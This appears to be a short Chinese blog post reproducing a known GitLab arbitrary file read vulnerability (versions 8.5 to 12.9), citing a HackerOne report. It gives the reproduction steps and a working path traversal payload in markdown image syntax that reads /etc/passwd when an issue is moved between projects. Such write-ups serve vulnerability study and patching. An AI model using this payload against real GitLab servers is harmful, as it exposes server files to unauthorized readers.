gitlab任意文件读取漏洞 复现

作者: print("") 分类: 漏洞复现 发布时间: 2021-06-18 14:31

受影响版本

GitLab GitLab EE >=8.5,<=12.9

GitLab GitLab CE >=8.5,<=12.9

首先建立两个项目 test1 and test2

新建完后,再test1 建立一个issues

payload:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

移动到test1 里面去。然后找到test 的issues


下载下来

参考文章:https://hackerone.com/reports/827052

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注